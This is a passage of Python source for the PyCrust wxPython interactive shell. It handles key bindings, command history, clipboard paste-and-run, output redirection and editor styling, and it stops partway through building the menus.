from .drag_and_drop import clipboard as enClipboard
sys.ps3 = '<-- ' # Input prompt.
NAVKEYS = (WXK_END, WXK_LEFT, WXK_RIGHT, WXK_UP, WXK_DOWN, WXK_PRIOR, WXK_NEXT)
if wxPlatform == '__WXMSW__':
faces = { 'times' : 'Times New Roman',
'mono' : 'Courier New',
'helv' : 'Lucida Console',
'lucida' : 'Lucida Console',
'other' : 'Comic Sans MS',
'size' : 10,
'lnsize' : 9,
'backcol': '#FFFFFF',
}
# Versions of wxPython prior to 2.3.2 had a sizing bug on Win platform.
# The font was 2 points too large. So we need to reduce the font size.
if (wxMAJOR_VERSION, wxMINOR_VERSION, wxRELEASE_NUMBER) < (2, 3, 2):
faces['size'] -= 2
faces['lnsize'] -= 2
else: # GTK
faces = { 'times' : 'Times',
'mono' : 'Courier',
'helv' : 'Helvetica',
'other' : 'new century schoolbook',
'size' : 12,
'lnsize' : 10,
'backcol': '#FFFFFF',
}
class ShellFacade:
"""Simplified interface to all shell-related functionality.
This is a semi-transparent facade, in that all attributes of other are
still accessible, even though only some are visible to the user."""
name = 'PyCrust Shell Interface'
revision = __revision__
def __init__(self, other):
"""Create a ShellFacade instance."""
methods = ['ask',
'clear',
'pause',
'prompt',
'quit',
'redirectStderr',
'redirectStdin',
'redirectStdout',
'run',
'runfile',
'wrap',
'zoom',
]
for method in methods:
self.__dict__[method] = getattr(other, method)
d = self.__dict__
d['other'] = other
d['helpText'] = \
"""
* Key bindings:
Home Go to the beginning of the command or line.
Shift+Home Select to the beginning of the command or line.
Shift+End Select to the end of the line.
End Go to the end of the line.
Ctrl+C Copy selected text, removing prompts.
Ctrl+Shift+C Copy selected text, retaining prompts.
Ctrl+X Cut selected text.
Ctrl+V Paste from clipboard.
Ctrl+Shift+V Paste and run multiple commands from clipboard.
Ctrl+Up Arrow Retrieve Previous History item.
Alt+P Retrieve Previous History item.
Ctrl+Down Arrow Retrieve Next History item.
Alt+N Retrieve Next History item.
Shift+Up Arrow Insert Previous History item.
Shift+Down Arrow Insert Next History item.
F8 Command-completion of History item.
(Type a few characters of a previous command and then press F8.)
F9 Pop-up window of matching History items.
(Type a few characters of a previous command and then press F9.)
"""
def help(self):
"""Display some useful information about how to use the shell."""
self.write(self.helpText)
def __getattr__(self, name):
if hasattr(self.other, name):
return getattr(self.other, name)
else:
raise AttributeError(name)
def __setattr__(self, name, value):
if name in self.__dict__:
self.__dict__[name] = value
elif hasattr(self.other, name):
return setattr(self.other, name, value)
else:
raise AttributeError(name)
def _getAttributeNames(self):
"""Return list of magic attributes to extend introspection."""
list = ['autoCallTip',
'autoComplete',
'autoCompleteCaseInsensitive',
'autoCompleteIncludeDouble',
'autoCompleteIncludeMagic',
'autoCompleteIncludeSingle',
]
list.sort()
return list
class Shell(wxStyledTextCtrl):
"""PyCrust Shell based on wxStyledTextCtrl."""
name = 'PyCrust Shell'
revision = __revision__
def __init__(self, parent, id=-1, pos=wxDefaultPosition, \
size=wxDefaultSize, style=wxCLIP_CHILDREN, introText='', \
locals=None, InterpClass=None, *args, **kwds):
"""Create a PyCrust Shell instance."""
wxStyledTextCtrl.__init__(self, parent, id, pos, size, style)
# Grab these so they can be restored by self.redirect* methods.
self.stdin = sys.stdin
self.stdout = sys.stdout
self.stderr = sys.stderr
self.handlers = []
self.python_obj_paste_handler = None
# Add the current working directory "." to the search path.
sys.path.insert(0, os.curdir)
# Import a default interpreter class if one isn't provided.
if InterpClass == None:
from PyCrust.interpreter import Interpreter
else:
Interpreter = InterpClass
# Create default locals so we have something interesting.
shellLocals = {'__name__': 'PyCrust-Shell',
'__doc__': 'PyCrust-Shell, The PyCrust Python Shell.',
'__version__': VERSION,
}
# Add the dictionary that was passed in.
if locals:
shellLocals.update(locals)
# Create a replacement for stdin.
self.reader = PseudoFileIn(self.readline)
self.reader.input = ''
self.reader.isreading = 0
# Set up the interpreter.
self.interp = Interpreter(locals=shellLocals, \
rawin=self.raw_input, \
stdin=self.reader, \
stdout=PseudoFileOut(self.writeOut), \
stderr=PseudoFileErr(self.writeErr), \
*args, **kwds)
# Find out for which keycodes the interpreter will autocomplete.
self.autoCompleteKeys = self.interp.getAutoCompleteKeys()
# Keep track of the last non-continuation prompt positions.
self.promptPosStart = 0
self.promptPosEnd = 0
# Keep track of multi-line commands.
self.more = 0
# Create the command history. Commands are added into the front of
# the list (ie. at index 0) as they are entered. self.historyIndex
# is the current position in the history; it gets incremented as you
# retrieve the previous command, decremented as you retrieve the
# next, and reset when you hit Enter. self.historyIndex == -1 means
# you're on the current command, not in the history.
self.history = []
self.historyIndex = -1
self.historyPrefix = 0
# Assign handlers for keyboard events.
EVT_KEY_DOWN(self, self.OnKeyDown)
EVT_CHAR(self, self.OnChar)
# Assign handlers for wxSTC events.
EVT_STC_UPDATEUI(self, id, self.OnUpdateUI)
EVT_STC_USERLISTSELECTION(self, id, self.OnHistorySelected)
# Configure various defaults and user preferences.
self.config()
# Display the introductory banner information.
try: self.showIntro(introText)
except: pass
# Assign some pseudo keywords to the interpreter's namespace.
try: self.setBuiltinKeywords()
except: pass
# Add 'shell' to the interpreter's local namespace.
try: self.setLocalShell()
except: pass
# Do this last so the user has complete control over their
# environment. They can override anything they want.
try: self.execStartupScript(self.interp.startupScript)
except: pass
def destroy(self):
# del self.interp
pass
def config(self):
"""Configure shell based on user preferences."""
self.SetMarginType(1, wxSTC_MARGIN_NUMBER)
self.SetMarginWidth(1, 40)
self.SetLexer(wxSTC_LEX_PYTHON)
self.SetKeyWords(0, ' '.join(keyword.kwlist))
self.setStyles(faces)
self.SetViewWhiteSpace(0)
self.SetTabWidth(4)
self.SetUseTabs(0)
# Do we want to automatically pop up command completion options?
self.autoComplete = 1
self.autoCompleteIncludeMagic = 1
self.autoCompleteIncludeSingle = 1
self.autoCompleteIncludeDouble = 1
self.autoCompleteCaseInsensitive = 1
self.AutoCompSetIgnoreCase(self.autoCompleteCaseInsensitive)
self.AutoCompSetSeparator(ord('\n'))
# Do we want to automatically pop up command argument help?
self.autoCallTip = 1
self.CallTipSetBackground(wxColour(255, 255, 232))
self.wrap()
try:
            self.SetEndAtLastLine(False)
except AttributeError:
pass
def showIntro(self, text=''):
"""Display introductory text in the shell."""
if text:
if not text.endswith(os.linesep): text += os.linesep
self.write(text)
try:
self.write(self.interp.introText)
except AttributeError:
pass
wxCallAfter(self.ScrollToLine, 0)
def setBuiltinKeywords(self):
"""Create pseudo keywords as part of builtins.
This simply sets "close", "exit" and "quit" to a helpful string.
"""
import six.moves.builtins
six.moves.builtins.close = six.moves.builtins.exit = six.moves.builtins.quit = \
'Click on the close button to leave the application.'
def quit(self):
"""Quit the application."""
# XXX Good enough for now but later we want to send a close event.
# In the close event handler we can make sure they want to quit.
# Other applications, like PythonCard, may choose to hide rather than
# quit so we should just post the event and let the surrounding app
# decide what it wants to do.
self.write('Click on the close button to leave the application.')
def setLocalShell(self):
"""Add 'shell' to locals as reference to ShellFacade instance."""
self.interp.locals['shell'] = ShellFacade(other=self)
def execStartupScript(self, startupScript):
"""Execute the user's PYTHONSTARTUP script if they have one."""
if startupScript and os.path.isfile(startupScript):
startupText = 'Startup script executed: ' + startupScript
self.push('print %s;execfile(%s)' % \
('startupText', 'startupScript'))
else:
self.push('')
def setStyles(self, faces):
"""Configure font size, typeface and color for lexer."""
# Default style
self.StyleSetSpec(wxSTC_STYLE_DEFAULT, "face:%(mono)s,size:%(size)d,back:%(backcol)s" % faces)
self.StyleClearAll()
# Built in styles
self.StyleSetSpec(wxSTC_STYLE_LINENUMBER, "back:#C0C0C0,face:%(mono)s,size:%(lnsize)d" % faces)
self.StyleSetSpec(wxSTC_STYLE_CONTROLCHAR, "face:%(mono)s" % faces)
self.StyleSetSpec(wxSTC_STYLE_BRACELIGHT, "fore:#0000FF,back:#FFFF88")
self.StyleSetSpec(wxSTC_STYLE_BRACEBAD, "fore:#FF0000,back:#FFFF88")
# Python styles
self.StyleSetSpec(wxSTC_P_DEFAULT, "face:%(mono)s" % faces)
self.StyleSetSpec(wxSTC_P_COMMENTLINE, "fore:#007F00,face:%(mono)s" % faces)
self.StyleSetSpec(wxSTC_P_NUMBER, "")
self.StyleSetSpec(wxSTC_P_STRING, "fore:#7F007F,face:%(mono)s" % faces)
self.StyleSetSpec(wxSTC_P_CHARACTER, "fore:#7F007F,face:%(mono)s" % faces)
self.StyleSetSpec(wxSTC_P_WORD, "fore:#00007F,bold")
self.StyleSetSpec(wxSTC_P_TRIPLE, "fore:#7F0000")
self.StyleSetSpec(wxSTC_P_TRIPLEDOUBLE, "fore:#000033,back:#FFFFE8")
self.StyleSetSpec(wxSTC_P_CLASSNAME, "fore:#0000FF,bold")
self.StyleSetSpec(wxSTC_P_DEFNAME, "fore:#007F7F,bold")
self.StyleSetSpec(wxSTC_P_OPERATOR, "")
self.StyleSetSpec(wxSTC_P_IDENTIFIER, "")
self.StyleSetSpec(wxSTC_P_COMMENTBLOCK, "fore:#7F7F7F")
self.StyleSetSpec(wxSTC_P_STRINGEOL, "fore:#000000,face:%(mono)s,back:#E0C0E0,eolfilled" % faces)
def OnUpdateUI(self, evt):
"""Check for matching braces."""
braceAtCaret = -1
braceOpposite = -1
charBefore = None
caretPos = self.GetCurrentPos()
if caretPos > 0:
charBefore = self.GetCharAt(caretPos - 1)
#*** Patch to fix bug in wxSTC for wxPython < 2.3.3.
if charBefore < 0:
charBefore = 32 # Mimic a space.
#***
styleBefore = self.GetStyleAt(caretPos - 1)
# Check before.
if charBefore and chr(charBefore) in '[]{}()' \
and styleBefore == wxSTC_P_OPERATOR:
braceAtCaret = caretPos - 1
# Check after.
if braceAtCaret < 0:
charAfter = self.GetCharAt(caretPos)
#*** Patch to fix bug in wxSTC for wxPython < 2.3.3.
if charAfter < 0:
charAfter = 32 # Mimic a space.
#***
styleAfter = self.GetStyleAt(caretPos)
if charAfter and chr(charAfter) in '[]{}()' \
and styleAfter == wxSTC_P_OPERATOR:
braceAtCaret = caretPos
if braceAtCaret >= 0:
braceOpposite = self.BraceMatch(braceAtCaret)
if braceAtCaret != -1 and braceOpposite == -1:
self.BraceBadLight(braceAtCaret)
else:
self.BraceHighlight(braceAtCaret, braceOpposite)
def OnChar(self, event):
"""Keypress event handler.
Only receives an event if OnKeyDown calls event.Skip() for
the corresponding event."""
# Prevent modification of previously submitted commands/responses.
if not self.CanEdit():
return
key = event.KeyCode()
currpos = self.GetCurrentPos()
stoppos = self.promptPosEnd
# Return (Enter) needs to be ignored in this handler.
if key == WXK_RETURN:
pass
elif key in self.autoCompleteKeys:
# Usually the dot (period) key activates auto completion.
# Get the command between the prompt and the cursor.
# Add the autocomplete character to the end of the command.
command = self.GetTextRange(stoppos, currpos)
if command == '':
self.historyShow()
else:
command += chr(key)
self.write(chr(key))
if self.autoComplete: self.autoCompleteShow(command)
elif key == ord('('):
# The left paren activates a call tip and cancels
# an active auto completion.
if self.AutoCompActive(): self.AutoCompCancel()
# Get the command between the prompt and the cursor.
# Add the '(' to the end of the command.
self.ReplaceSelection('')
command = self.GetTextRange(stoppos, currpos) + '('
self.write('(')
if self.autoCallTip: self.autoCallTipShow(command)
else:
# Allow the normal event handling to take place.
event.Skip()
def OnKeyDown(self, event):
"""Key down event handler."""
# Prevent modification of previously submitted commands/responses.
key = event.KeyCode()
controlDown = event.ControlDown()
altDown = event.AltDown()
shiftDown = event.ShiftDown()
currpos = self.GetCurrentPos()
endpos = self.GetTextLength()
selecting = self.GetSelectionStart() != self.GetSelectionEnd()
# Return (Enter) is used to submit a command to the interpreter.
if not controlDown and key == WXK_RETURN:
if self.AutoCompActive():
event.Skip()
return
if self.CallTipActive(): self.CallTipCancel()
self.processLine()
# Ctrl+Return (Cntrl+Enter) is used to insert a line break.
elif controlDown and key == WXK_RETURN:
if self.AutoCompActive(): self.AutoCompCancel()
if self.CallTipActive(): self.CallTipCancel()
if (not self.more and
(self.GetTextRange(self.promptPosEnd,
self.GetCurrentPos()) == '')):
self.historyShow()
else:
self.insertLineBreak()
# If the auto-complete window is up let it do its thing.
elif self.AutoCompActive():
event.Skip()
# Let Ctrl-Alt-* get handled normally.
elif controlDown and altDown:
event.Skip()
# Clear the current, unexecuted command.
elif key == WXK_ESCAPE:
if self.CallTipActive():
event.Skip()
else:
self.clearCommand()
# Cut to the clipboard.
elif (controlDown and key in (ord('X'), ord('x'))) \
or (shiftDown and key == WXK_DELETE):
self.Cut()
# Copy to the clipboard.
elif controlDown and not shiftDown \
and key in (ord('C'), ord('c'), WXK_INSERT):
self.Copy()
# Copy to the clipboard, including prompts.
elif controlDown and shiftDown \
and key in (ord('C'), ord('c'), WXK_INSERT):
self.CopyWithPrompts()
# Home needs to be aware of the prompt.
elif key == WXK_HOME:
home = self.promptPosEnd
if currpos > home:
self.SetCurrentPos(home)
if not selecting and not shiftDown:
self.SetAnchor(home)
self.EnsureCaretVisible()
else:
event.Skip()
#
# The following handlers modify text, so we need to see if there
# is a selection that includes text prior to the prompt.
#
# Don't modify a selection with text prior to the prompt.
elif selecting and key not in NAVKEYS and not self.CanEdit():
pass
# Paste from the clipboard.
elif (controlDown and not shiftDown \
and key in (ord('V'), ord('v'))) \
or (shiftDown and not controlDown and key == WXK_INSERT):
self.Paste()
# Paste from the clipboard, run commands.
elif controlDown and shiftDown \
and key in (ord('V'), ord('v')):
self.PasteAndRun()
# Replace with the previous command from the history buffer.
elif (controlDown and key == WXK_UP) \
or (altDown and key in (ord('P'), ord('p'))):
self.OnHistoryReplace(step=+1)
# Replace with the next command from the history buffer.
elif (controlDown and key == WXK_DOWN) \
or (altDown and key in (ord('N'), ord('n'))):
self.OnHistoryReplace(step=-1)
# Insert the previous command from the history buffer.
elif (shiftDown and key == WXK_UP) and self.CanEdit():
self.OnHistoryInsert(step=+1)
# Insert the next command from the history buffer.
elif (shiftDown and key == WXK_DOWN) and self.CanEdit():
self.OnHistoryInsert(step=-1)
# Search up the history for the text in front of the cursor.
elif key == WXK_F8:
self.OnHistorySearch()
# Show all history entries that match the command typed so far:
elif key == WXK_F9:
self.historyShow(self.getCommand(rstrip=0))
# Don't backspace over the latest non-continuation prompt.
elif key == WXK_BACK:
if selecting and self.CanEdit():
event.Skip()
elif currpos > self.promptPosEnd:
event.Skip()
# Only allow these keys after the latest prompt.
elif key == WXK_DELETE:
if self.CanEdit():
event.Skip()
elif key == WXK_TAB:
if self.CanEdit() and not self.topLevelComplete():
event.Skip()
# Don't toggle between insert mode and overwrite mode.
elif key == WXK_INSERT:
pass
# Don't allow line deletion.
elif controlDown and key in (ord('L'), ord('l')):
pass
# Don't allow line transposition.
elif controlDown and key in (ord('T'), ord('t')):
pass
# Basic navigation keys should work anywhere.
elif key in NAVKEYS:
event.Skip()
# Protect the readonly portion of the shell.
elif not self.CanEdit():
pass
else:
event.Skip()
def clearCommand(self):
"""Delete the current, unexecuted command."""
startpos = self.promptPosEnd
endpos = self.GetTextLength()
self.SetSelection(startpos, endpos)
self.ReplaceSelection('')
self.more = 0
def OnHistoryReplace(self, step):
"""Replace with the previous/next command from the history buffer."""
if not self.historyPrefix:
self.historyPrefix = 1
self.historyMatches = None
prefix = self.getCommand(rstrip=0)
n = len(prefix)
if n > 0:
self.historyMatches = matches = []
for command in self.history:
if command[:n] == prefix and command not in matches:
matches.append(command)
self.clearCommand()
self.replaceFromHistory(step, self.historyMatches)
def replaceFromHistory(self, step, history=None):
"""Replace selection with command from the history buffer."""
self.ReplaceSelection('')
if history is None:
history = self.history
newindex = self.historyIndex + step
if -1 <= newindex <= len(history):
self.historyIndex = newindex
if 0 <= newindex <= len(history)-1:
command = history[self.historyIndex]
command = command.replace('\n', os.linesep + sys.ps2)
self.ReplaceSelection(command)
def OnHistoryInsert(self, step):
"""Insert the previous/next command from the history buffer."""
if not self.CanEdit():
return
startpos = self.GetCurrentPos()
self.replaceFromHistory(step)
endpos = self.GetCurrentPos()
self.SetSelection(endpos, startpos)
def OnHistorySearch(self):
"""Search up the history buffer for the text in front of the cursor."""
if not self.CanEdit():
return
startpos = self.GetCurrentPos()
# The text up to the cursor is what we search for.
numCharsAfterCursor = self.GetTextLength() - startpos
searchText = self.getCommand(rstrip=0)
if numCharsAfterCursor > 0:
searchText = searchText[:-numCharsAfterCursor]
if not searchText:
return
# Search upwards from the current history position and loop back
# to the beginning if we don't find anything.
if (self.historyIndex <= -1) \
or (self.historyIndex >= len(self.history)-2):
searchOrder = list(range(len(self.history)))
else:
searchOrder = list(range(self.historyIndex+1, len(self.history))) + \
list(range(self.historyIndex))
for i in searchOrder:
command = self.history[i]
if command[:len(searchText)] == searchText:
# Replace the current selection with the one we've found.
self.ReplaceSelection(command[len(searchText):])
endpos = self.GetCurrentPos()
self.SetSelection(endpos, startpos)
# We've now warped into middle of the history.
self.historyIndex = i
break
def setStatusText(self, text):
"""Display status information."""
# This method will most likely be replaced by the enclosing app
# to do something more interesting, like write to a status bar.
print(text)
def insertLineBreak(self):
"""Insert a new line break."""
if self.CanEdit():
self.write(os.linesep)
self.more = 1
self.prompt()
def processLine(self):
"""Process the line of text at which the user hit Enter."""
# The user hit ENTER and we need to decide what to do. They could be
# sitting on any line in the shell.
thepos = self.GetCurrentPos()
startpos = self.promptPosEnd
endpos = self.GetTextLength()
# If they hit RETURN inside the current command, execute the command.
if self.CanEdit():
self.SetCurrentPos(endpos)
self.interp.more = 0
command = self.GetTextRange(startpos, endpos)
lines = command.split(os.linesep + sys.ps2)
lines = [line.rstrip() for line in lines]
command = '\n'.join(lines)
if self.reader.isreading:
if not command:
# Match the behavior of the standard Python shell when
# the user hits return without entering a value.
command = '\n'
self.reader.input = command
self.write(os.linesep)
else:
self.push(command)
# Or replace the current command with the other command.
else:
# If the line contains a command (even an invalid one).
if self.getCommand(rstrip=0):
command = self.getMultilineCommand()
self.clearCommand()
self.write(command)
# Otherwise, put the cursor back where we started.
else:
self.SetCurrentPos(thepos)
self.SetAnchor(thepos)
def getMultilineCommand(self, rstrip=1):
"""Extract a multi-line command from the editor.
The command may not necessarily be valid Python syntax."""
# XXX Need to extract real prompts here. Need to keep track of the
# prompt every time a command is issued.
ps1 = str(sys.ps1)
ps1size = len(ps1)
ps2 = str(sys.ps2)
ps2size = len(ps2)
# This is a total hack job, but it works.
text = self.GetCurLine()[0]
line = self.GetCurrentLine()
while text[:ps2size] == ps2 and line > 0:
line -= 1
self.GotoLine(line)
text = self.GetCurLine()[0]
if text[:ps1size] == ps1:
line = self.GetCurrentLine()
self.GotoLine(line)
startpos = self.GetCurrentPos() + ps1size
line += 1
self.GotoLine(line)
while self.GetCurLine()[0][:ps2size] == ps2:
line += 1
self.GotoLine(line)
stoppos = self.GetCurrentPos()
command = self.GetTextRange(startpos, stoppos)
command = command.replace(os.linesep + sys.ps2, '\n')
command = command.rstrip()
command = command.replace('\n', os.linesep + sys.ps2)
else:
command = ''
if rstrip:
command = command.rstrip()
return command
def getCommand(self, text=None, rstrip=1):
"""Extract a command from text which may include a shell prompt.
The command may not necessarily be valid Python syntax."""
if not text:
text = self.GetCurLine()[0]
# Strip the prompt off the front of text leaving just the command.
command = self.lstripPrompt(text)
if command == text:
command = '' # Real commands have prompts.
if rstrip:
command = command.rstrip()
return command
def lstripPrompt(self, text):
"""Return text without a leading prompt."""
ps1 = str(sys.ps1)
ps1size = len(ps1)
ps2 = str(sys.ps2)
ps2size = len(ps2)
# Strip the prompt off the front of text.
if text[:ps1size] == ps1:
text = text[ps1size:]
elif text[:ps2size] == ps2:
text = text[ps2size:]
return text
def push(self, command):
"""Send command to the interpreter for execution."""
self.write(os.linesep)
busy = wxBusyCursor()
self.more = self.interp.push(command)
del busy
if not self.more:
self.addHistory(command.rstrip())
for handler in self.handlers:
handler()
self.prompt()
def addHistory(self, command):
"""Add command to the command history."""
# Reset the history position.
self.historyIndex = -1
self.historyPrefix = 0
# Insert this command into the history, unless it's a blank
# line or the same as the last command.
if command != '' \
and (len(self.history) == 0 or command != self.history[0]):
self.history.insert(0, command)
def write(self, text):
"""Display text in the shell.
Replace line endings with OS-specific endings."""
text = self.fixLineEndings(text)
self.AddText(text)
self.EnsureCaretVisible()
def fixLineEndings(self, text):
"""Return text with line endings replaced by OS-specific endings."""
lines = text.split('\r\n')
for l in range(len(lines)):
chunks = lines[l].split('\r')
for c in range(len(chunks)):
chunks[c] = os.linesep.join(chunks[c].split('\n'))
lines[l] = os.linesep.join(chunks)
text = os.linesep.join(lines)
return text
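    # Worked example (illustrative):
    #   fixLineEndings('a\r\nb\rc\nd') == os.linesep.join(['a', 'b', 'c', 'd'])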
def prompt(self):
"""Display appropriate prompt for the context, either ps1, ps2 or ps3.
If this is a continuation line, autoindent as necessary."""
isreading = self.reader.isreading
skip = 0
if isreading:
prompt = str(sys.ps3)
elif self.more:
prompt = str(sys.ps2)
else:
prompt = str(sys.ps1)
pos = self.GetCurLine()[1]
if pos > 0:
if isreading:
skip = 1
else:
self.write(os.linesep)
if not self.more:
self.promptPosStart = self.GetCurrentPos()
if not skip:
self.write(prompt)
if not self.more:
self.promptPosEnd = self.GetCurrentPos()
# Keep the undo feature from undoing previous responses.
self.EmptyUndoBuffer()
# XXX Add some autoindent magic here if more.
if self.more:
self.write(' '*4) # Temporary hack indentation.
self.EnsureCaretVisible()
self.ScrollToColumn(0)
def readline(self):
"""Replacement for stdin.readline()."""
input = ''
reader = self.reader
reader.isreading = 1
self.prompt()
try:
while not reader.input:
wxYield()
input = reader.input
finally:
reader.input = ''
reader.isreading = 0
return input
def raw_input(self, prompt=''):
"""Return string based on user input."""
if prompt:
self.write(prompt)
return self.readline()
def ask(self, prompt='Please enter your response:'):
"""Get response from the user using a dialog box."""
dialog = wxTextEntryDialog(None, prompt, \
'Input Dialog (Raw)', '')
try:
if dialog.ShowModal() == wxID_OK:
text = dialog.GetValue()
return text
finally:
dialog.Destroy()
return ''
def pause(self):
"""Halt execution pending a response from the user."""
self.ask('Press enter to continue:')
def clear(self):
"""Delete all text from the shell."""
self.ClearAll()
def run(self, command, prompt=1, verbose=1):
"""Execute command within the shell as if it was typed in directly.
>>> shell.run('print "this"')
>>> print "this"
this
>>>
"""
# Go to the very bottom of the text.
endpos = self.GetTextLength()
self.SetCurrentPos(endpos)
command = command.rstrip()
if prompt: self.prompt()
if verbose: self.write(command)
self.push(command)
def runfile(self, filename):
"""Execute all commands in file as if they were typed into the shell."""
file = open(filename)
try:
self.prompt()
for command in file.readlines():
if command[:6] == 'shell.': # Run shell methods silently.
self.run(command, prompt=0, verbose=0)
else:
self.run(command, prompt=0, verbose=1)
finally:
file.close()
def autoCompleteShow(self, command):
"""Display auto-completion popup list."""
list = self.interp.getAutoCompleteList(command,
includeMagic=self.autoCompleteIncludeMagic,
includeSingle=self.autoCompleteIncludeSingle,
includeDouble=self.autoCompleteIncludeDouble)
if list:
options = '\n'.join(list)
offset = 0
self.AutoCompShow(offset, options)
def autoCallTipShow(self, command):
"""Display argument spec and docstring in a popup bubble thingie."""
        if self.CallTipActive(): self.CallTipCancel()
(name, argspec, tip) = self.interp.getCallTip(command)
if argspec:
startpos = self.GetCurrentPos()
self.write(argspec + ')')
endpos = self.GetCurrentPos()
self.SetSelection(endpos, startpos)
if tip:
curpos = self.GetCurrentPos()
tippos = curpos - (len(name) + 1)
fallback = curpos - self.GetColumn(curpos)
# In case there isn't enough room, only go back to the fallback.
tippos = max(tippos, fallback)
self.CallTipShow(tippos, tip)
    def historyShow(self, prefix=''):
        """Display a popup list of history items beginning with prefix."""
items = []
for item in self.history:
item = item.replace( '\n', '\\n' )
if (prefix == item[:len(prefix)]) and item not in items:
items.append(item)
self.UserListShow(1, '\n'.join(items))
    def OnHistorySelected(self, event):
        """Handle selection of a command from the history popup list."""
command = event.GetText()
if command.find('\\n') >= 0:
command += '\\n'
command = command.replace( '\\n', os.linesep + sys.ps2)
self.clearCommand()
self.write(command)
# Process the command if the 'Enter' key was pressed:
key = event.GetKey()
if key == 28 or key == 1241712: # Is there a 'name' for the Enter key?
self.processLine()
    def topLevelComplete(self):
        """Try tab-completing the current command from top-level names."""
command = self.getCommand(rstrip=0)
completions = self.interp.getTopLevelCompletions(command)
if len(completions) == 0:
return 0
if len(completions) == 1:
self.write(completions[0][len(command):])
else:
self.AutoCompShow(len(command), '\n'.join(completions))
return 1
def writeOut(self, text):
"""Replacement for stdout."""
self.write(text)
def writeErr(self, text):
"""Replacement for stderr."""
self.write(text)
def redirectStdin(self, redirect=1):
"""If redirect is true then sys.stdin will come from the shell."""
if redirect:
sys.stdin = self.reader
else:
sys.stdin = self.stdin
def redirectStdout(self, redirect=1):
"""If redirect is true then sys.stdout will go to the shell."""
if redirect:
sys.stdout = PseudoFileOut(self.writeOut)
else:
sys.stdout = self.stdout
def redirectStderr(self, redirect=1):
"""If redirect is true then sys.stderr will go to the shell."""
if redirect:
sys.stderr = PseudoFileErr(self.writeErr)
else:
sys.stderr = self.stderr
def CanCut(self):
"""Return true if text is selected and can be cut."""
if self.GetSelectionStart() != self.GetSelectionEnd() \
and self.GetSelectionStart() >= self.promptPosEnd \
and self.GetSelectionEnd() >= self.promptPosEnd:
return 1
else:
return 0
def CanCopy(self):
"""Return true if text is selected and can be copied."""
return self.GetSelectionStart() != self.GetSelectionEnd()
def CanPaste(self):
"""Return true if a paste should succeed."""
if self.CanEdit() and \
(wxStyledTextCtrl.CanPaste(self) or \
wxTheClipboard.IsSupported(PythonObject)):
return 1
else:
return 0
def CanEdit(self):
"""Return true if editing should succeed."""
if self.GetSelectionStart() != self.GetSelectionEnd():
if self.GetSelectionStart() >= self.promptPosEnd \
and self.GetSelectionEnd() >= self.promptPosEnd:
return 1
else:
return 0
else:
return self.GetCurrentPos() >= self.promptPosEnd
def Cut(self):
"""Remove selection and place it on the clipboard."""
if self.CanCut() and self.CanCopy():
if self.AutoCompActive(): self.AutoCompCancel()
            if self.CallTipActive(): self.CallTipCancel()
self.Copy()
self.ReplaceSelection('')
def Copy(self):
"""Copy selection and place it on the clipboard."""
if self.CanCopy():
command = self.GetSelectedText()
command = command.replace(os.linesep + sys.ps2, os.linesep)
command = command.replace(os.linesep + sys.ps1, os.linesep)
command = self.lstripPrompt(text=command)
data = wxTextDataObject(command)
if wxTheClipboard.Open():
wxTheClipboard.SetData(data)
wxTheClipboard.Close()
def CopyWithPrompts(self):
"""Copy selection, including prompts, and place it on the clipboard."""
if self.CanCopy():
command = self.GetSelectedText()
data = wxTextDataObject(command)
if wxTheClipboard.Open():
wxTheClipboard.SetData(data)
wxTheClipboard.Close()
def Paste(self):
"""Replace selection with clipboard contents."""
if self.CanPaste() and wxTheClipboard.Open():
try:
if wxTheClipboard.IsSupported(wxDataFormat(wxDF_TEXT)):
data = wxTextDataObject()
if wxTheClipboard.GetData(data):
self.ReplaceSelection('')
command = data.GetText()
command = command.rstrip()
command = self.fixLineEndings(command)
command = self.lstripPrompt(text=command)
command = command.replace(os.linesep + sys.ps2, '\n')
command = command.replace(os.linesep, '\n')
command = command.replace('\n', os.linesep + sys.ps2)
self.write(command)
if wxTheClipboard.IsSupported(PythonObject) and \
self.python_obj_paste_handler is not None:
# note that the presence of a PythonObject on the
# clipboard is really just a signal to grab the data
# from our singleton clipboard instance
data = enClipboard.data
self.python_obj_paste_handler(data)
finally:
wxTheClipboard.Close()
return
def PasteAndRun(self):
"""Replace selection with clipboard contents, run commands."""
if wxTheClipboard.Open():
if wxTheClipboard.IsSupported(wxDataFormat(wxDF_TEXT)):
data = wxTextDataObject()
if wxTheClipboard.GetData(data):
endpos = self.GetTextLength()
self.SetCurrentPos(endpos)
startpos = self.promptPosEnd
self.SetSelection(startpos, endpos)
self.ReplaceSelection('')
text = data.GetText()
text = text.strip()
text = self.fixLineEndings(text)
text = self.lstripPrompt(text=text)
text = text.replace(os.linesep + sys.ps1, '\n')
text = text.replace(os.linesep + sys.ps2, '\n')
text = text.replace(os.linesep, '\n')
lines = text.split('\n')
commands = []
command = ''
for line in lines:
if line.strip() != '' and line.lstrip() == line:
# New command.
if command:
# Add the previous command to the list.
commands.append(command)
# Start a new command, which may be multiline.
command = line
else:
# Multiline command. Add to the command.
command += '\n'
command += line
commands.append(command)
for command in commands:
command = command.replace('\n', os.linesep + sys.ps2)
self.write(command)
self.processLine()
wxTheClipboard.Close()
def wrap(self, wrap=1):
"""Sets whether text is word wrapped."""
try:
self.SetWrapMode(wrap)
except AttributeError:
return 'Wrapping is not available in this version of PyCrust.'
def zoom(self, points=0):
"""Set the zoom level.
This number of points is added to the size of all fonts.
It may be positive to magnify or negative to reduce."""
self.SetZoom(points)
wxID_SELECTALL = wxNewId()
ID_AUTOCOMP = wxNewId()
ID_AUTOCOMP_SHOW = wxNewId()
ID_AUTOCOMP_INCLUDE_MAGIC = wxNewId()
ID_AUTOCOMP_INCLUDE_SINGLE = wxNewId()
ID_AUTOCOMP_INCLUDE_DOUBLE = wxNewId()
ID_CALLTIPS = wxNewId()
ID_CALLTIPS_SHOW = wxNewId()
ID_FILLING = wxNewId()
ID_FILLING_AUTO_UPDATE = wxNewId()
ID_FILLING_SHOW_METHODS = wxNewId()
ID_FILLING_SHOW_CLASS = wxNewId()
ID_FILLING_SHOW_DICT = wxNewId()
ID_FILLING_SHOW_DOC = wxNewId()
ID_FILLING_SHOW_MODULE = wxNewId()
class ShellMenu:
"""Mixin class to add standard menu items."""
def createMenus(self):
m = self.fileMenu = wxMenu()
m.AppendSeparator()
m.Append(wxID_EXIT, 'E&xit', 'Exit PyCrust')
m = self.editMenu = wxMenu()
m.Append(wxID_UNDO, '&Undo \tCtrl+Z', 'Undo the last action')
m.Append(wxID_REDO, '&Redo \tCtrl+Y', 'Redo the last undone action')
m.AppendSeparator()
m.Append(wxID_CUT, 'Cu&t \tCtrl+X', 'Cut the selection')
